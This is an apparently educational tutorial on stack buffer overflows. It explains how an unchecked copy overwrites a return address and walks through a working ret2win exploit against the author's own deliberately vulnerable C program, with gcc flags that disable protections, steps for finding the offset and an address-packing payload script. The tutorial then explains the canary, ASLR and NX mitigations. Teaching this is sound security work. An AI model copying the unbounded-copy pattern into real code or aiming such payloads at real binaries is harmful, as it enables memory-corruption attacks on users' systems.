Smashing the Stack: A Visual Guide to Buffer Overflows
How an unchecked write overwrites a saved return address, with a working ret2win demo, and why canaries, ASLR, and NX exist.
In 1996, someone writing as Aleph One published Smashing the Stack for Fun and Profit in Phrack 49. Three decades later it’s still the paper most security courses hand you first, because the bug it describes hasn’t gone away. It’s just gotten harder to pull off thanks to the mitigations we’ll get to at the end. Understanding why those mitigations exist means understanding what a function call actually does to memory, which is hard to hold in your head without a picture. So this post has a lot of pictures.
Why a decades-old bug still matters
A stack buffer overflow happens when a program writes more data into a fixed-size local buffer than that buffer can hold, and the extra bytes spill into adjacent memory instead of being rejected. In a memory-unsafe language like C or C++, nothing stops that write. The consequences range from “the program crashes” to “an attacker who controls the input now controls where the program jumps next”, which is another way of saying arbitrary code execution. It’s tracked today as CWE-121, and it’s the same root cause behind the 1988 Morris worm, decades of CVEs in C-language servers and parsers, and no small number of “critical” security advisories still being filed for embedded and legacy code.
Important (Scope of this post)
This is a conceptual walkthrough of how the bug works and why it’s dangerous: the same material any intro security course covers. Further down there’s a working demo, but it only redirects execution to a function that’s already compiled into a program you build yourself: no shellcode, no injected code, and nothing aimed at software you don’t own. Run it in a disposable VM or container, never anywhere that matters.
How memory is laid out under your program
Every running process gets its own virtual address space. The part that matters here is that the stack and the heap grow toward each other from opposite ends of that space:
Every time a function is called, a new stack frame is pushed onto the stack: room for its local variables, its saved bookkeeping, and the address execution should return to when it’s done. That frame is where our bug lives.
Anatomy of a stack frame
Take this function:
void vulnerable(char *input) { char buf[64]; strcpy(buf, input); // no bounds check, copies until it hits '\0' printf("You said: %s\n", buf);}When vulnerable is called, its frame looks like this (this is the classic
x86 layout the original paper uses; the same idea holds on other
architectures, just with different register names):
buf sits at the bottom of the frame, at lower addresses than the saved base pointer and the return address above it.The detail that makes the whole bug possible: buf occupies the lowest
addresses in the frame, and strcpy writes forward, toward higher
addresses. So a write that runs past the end of buf doesn’t wrap around or
crash immediately. It keeps going, straight into the saved base pointer, and
then into the return address sitting right above it.
What an overflow actually overwrites
Call vulnerable("AAAA...AAAA") with more than 64 'A' bytes (0x41 each),
and here’s the same frame afterward:
In this toy example the overflow just crashes: 0x41414141 almost
certainly isn’t mapped memory. But the attacker doesn’t have to send 'A'
characters. They control every byte of the input, which means they control
exactly what value lands in that return-address slot. The two classic
choices from the original paper are:
- Point it at injected code. Fill part of the buffer with actual machine instructions and aim the return address at them, so the CPU starts executing attacker-supplied bytes the moment the function returns.
- Point it at code that already exists. Modern defenses make the first option hard (more below), so real-world exploits increasingly reuse existing code in the binary or its libraries instead, chaining together legitimate instructions to do something the program was never meant to do.
Either way, the core move is the same: a write bug becomes a control-flow hijack, because on this architecture the thing that decides “what runs next” and the thing holding “user data” live in the same writable memory, one right after the other.
A hands-on simulation: hijacking control flow yourself
Theory is one thing. Here’s a minimal, deliberately vulnerable program you can compile and attack yourself, plus the exact payload that does it. It redirects execution to a function that’s already compiled into the binary rather than injecting new code, which is both simpler to build and closer to how real exploits work today now that NX makes injected shellcode hard to run.
Important (Run this in a disposable VM or container you don’t care about)
This deliberately switches off protections a real toolchain enables by default. Never disable these on a machine, account, or service that matters. Compile and run this only in a throwaway VM or container, against this exact code.
The target
#include <stdio.h>#include <unistd.h>
void win(void) { puts("\n🚩 win() ran: control flow was hijacked via the return address.");}
void vulnerable(void) { char buf[64]; read(0, buf, 200); // reads up to 200 bytes into 64, no bounds check printf("You said: %.64s\n", buf);}
int main(void) { setvbuf(stdout, NULL, _IONBF, 0); // don't lose buffered output when we crash vulnerable(); puts("vulnerable() returned normally."); return 0;}win() is never called anywhere in this program. The only way it runs is if
something hijacks control flow into it, which is exactly what the payload
below does.
Building it with the safety rails off
gcc -fno-stack-protector -no-pie -O0 -o vuln vuln.c-fno-stack-protectorremoves the canary from Fig. 5, so the overwrite isn’t caught before it’s used.-no-piegives the binary a fixed, predictable load address, sowin()lands at the same address every run. A real attack without an accompanying info leak has to defeat ASLR to get this for free.- NX doesn’t need to be touched: this payload never injects new code, only redirects execution to code that’s already there.
Finding the offset
Exactly how many padding bytes it takes to reach the return address depends
on your compiler and its version. Don’t assume it’s simply 64 + 8. Find
it for your own build with a debugger and a long, distinctive input rather
than guessing:
gdb ./vuln(gdb) run <<< $(python3 -c 'print("A"*100)')# Program received signal SIGSEGV ...(gdb) print $rsp# use the crash address, or a cyclic/de Bruijn pattern instead of plain# 'A's, to compute the exact offset for your buildFor this post’s build, the offset came out to 72 bytes: 64 for buf
plus 8 for the saved base pointer sitting right above it.
Finding win()’s address
objdump -d vuln | grep -A1 '<win>:'# 0000000000401196 <win>:# 401196: 55 push %rbpThe payload
#!/usr/bin/env python3import struct, sys
OFFSET = 72 # from the offset-finding step aboveWIN_ADDR = 0x0000000000401196 # from `objdump -d vuln`, on your own build
payload = b"A" * OFFSET + struct.pack("<Q", WIN_ADDR)sys.stdout.buffer.write(payload)72 bytes of padding to fill buf and the saved base pointer, followed by
win()’s address packed little-endian, the same return-address slot from
Fig. 3, aimed somewhere specific instead of at 0x41414141:
buf and the saved base pointer, followed by the 8-byte address of win(), little-endian.Running it
$ ./vulnhelloYou said: hellovulnerable() returned normally.
$ python3 payload.py | ./vulnYou said: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
🚩 win() ran: control flow was hijacked via the return address.Segmentation fault (core dumped)The segfault right after win() runs is expected, not a mistake in the
payload: this only overwrote one return address. When win() itself
tries to return, it pops whatever happens to sit above it on the stack next,
and there was never a valid address planted there. That’s the whole demo:
one unbounded write, 72 bytes of predictable padding, and 8 bytes of address
turned “return to caller” into “run this arbitrary function instead.”
Note (What this demo deliberately doesn’t show)
No shellcode, no NOP sled, no bypassing a canary or ASLR. Those are separate, harder problems layered on top of this same core bug, which is exactly why the mitigations in the next section exist. This demo isolates the one idea worth internalizing: when a return address lives in the same writable memory as unchecked user input, whoever controls the input controls where execution goes next.
Why this is a serious risk
It doesn’t take much
The vulnerable function above is four lines long, uses a completely ordinary standard-library call, and would have compiled without a single warning on most toolchains for decades. Bugs of this shape have historically hidden in format parsers, protocol decoders, header handlers: anywhere a length is read from untrusted input and trusted a little too much.
Real-world impact
- The Morris worm (1988), one of the first self-propagating internet
worms, exploited a stack buffer overflow in
fingerd. - Buffer overflows are consistently one of the most reported vulnerability classes in the CWE Top 25 most dangerous software weaknesses, decades after they were first documented.
- Because they can lead directly to remote code execution, they’re routinely rated critical severity: a single unchecked copy in network-facing code can be enough to fully compromise a host.
How modern systems defend against it
The reason this specific example won’t just work if you copy-paste it today is that mainstream toolchains and OSes now stack several independent mitigations on top of each other.
Stack canaries
The compiler places a random value, the canary, between local buffers and the saved base pointer, and inserts a check right before the function returns.
This is why the toy example needs -fno-stack-protector to behave the way
the diagrams describe: GCC and Clang have enabled canaries by default since
the mid-2000s.
Address space layout randomization (ASLR)
The OS randomizes where the stack, heap, and shared libraries are loaded on every run. Even if an attacker corrupts a return address, reliably guessing where their injected code or reusable gadgets actually live in memory becomes much harder.
Non-executable stack (NX / DEP)
Memory pages holding the stack are marked non-executable at the hardware level, so even a return address that does point at injected shellcode can’t run it: the CPU refuses to execute instructions fetched from that page. This is what pushed attackers toward reusing existing executable code instead of injecting new code.
Safer languages and tooling
The most durable fix is structural rather than reactive: languages like Rust and Go make this entire bug class largely unrepresentable by enforcing bounds-checked memory access at compile time or runtime. Where C and C++ remain, fuzzing (e.g. libFuzzer, AFL) and sanitizers (AddressSanitizer) catch overflows like this one long before they ship.
Note
No single mitigation here is bulletproof on its own: canaries, ASLR, and NX are typically deployed together specifically because bypassing all three at once is a much taller order than bypassing any one of them alone.
Key takeaways
- A stack buffer overflow happens when a write to a fixed-size local buffer isn’t bounds-checked, and the extra bytes spill into adjacent stack memory.
- Because local buffers sit at lower addresses than the saved base pointer and return address, an overflow that writes far enough overwrites exactly the data that controls where the program executes next.
- That’s what turns a memory-safety bug into a control-flow hijack, and potentially into remote code execution.
- Stack canaries, ASLR, and non-executable stack pages each close off part of the attack independently; modern toolchains enable all three by default for exactly that reason.
- The most reliable long-term fix is avoiding the bug class entirely, via memory-safe languages and rigorous fuzzing/sanitization of C/C++ code that can’t yet be replaced.
Further reading
- Aleph One, Smashing the Stack for Fun and Profit, Phrack 49 (1996): the original paper this post is a modern, visual companion to.
- MITRE, CWE-121: Stack-based Buffer Overflow
- MITRE/CISA, CWE Top 25 Most Dangerous Software Weaknesses
- PayloadsAllTheThings: a community-maintained collection of payloads and bypasses across many attack types and languages, useful once you’re ready to look past this one bug class.